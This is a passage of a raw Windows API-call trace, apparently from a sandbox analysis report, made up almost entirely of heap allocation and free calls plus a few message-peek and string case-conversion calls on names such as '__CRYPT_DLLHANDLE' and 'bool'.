0x8dec40 [0181.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0181.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0181.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0181.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xef06) returned 0xa5f008 [0181.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0181.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0181.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0181.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0181.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0181.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0181.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0181.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0181.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0181.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0181.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0181.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0181.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0181.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0181.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0181.262] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0181.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0181.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0181.262] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0181.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0181.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0181.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0181.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0181.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0181.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0181.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0181.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0181.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0181.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0181.263] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0181.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0181.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0181.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0181.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27e8 [0181.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0181.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0181.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0181.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0181.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdb10 [0181.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0181.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0181.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0181.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0181.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0181.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0181.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0181.263] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0181.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0181.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0181.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0181.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0181.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0181.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0181.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0181.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0181.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0181.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0181.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0181.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0181.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0181.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0181.264] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0181.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0181.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0181.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0181.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0181.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0181.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0181.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0181.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0181.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0181.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0181.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0181.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0181.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0181.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0181.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0181.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0181.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0181.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0181.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0181.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0181.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0181.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0181.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0181.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.265] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0181.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0181.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0181.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0181.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0181.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0181.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0181.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0181.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0181.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0181.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0181.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0181.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0181.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0181.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0181.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0181.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0181.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0181.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0181.266] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0181.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0181.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0181.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0181.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0181.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0181.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0181.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0181.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0181.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0181.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0181.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0181.267] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0181.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0181.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8a0 [0181.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0181.267] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0181.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0181.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0181.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0181.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0181.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0181.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0181.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0181.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0181.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0181.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0181.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0181.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0181.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0181.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0181.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0181.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0181.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0181.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0181.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0181.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0181.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0181.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0181.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0181.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0181.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0181.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0181.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0181.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0181.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0181.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0181.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0181.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0181.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0181.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0181.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0181.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0181.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0181.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0181.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0181.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0181.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0181.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0181.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0181.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0181.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0181.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0181.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0181.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0181.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0181.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0181.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0181.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0181.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0181.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0181.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0181.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0181.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0181.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0181.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0181.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0181.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0181.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0181.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0181.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0181.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0181.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0181.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0181.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0181.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0181.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0181.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0181.271] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.271] RtlAllocateHeap 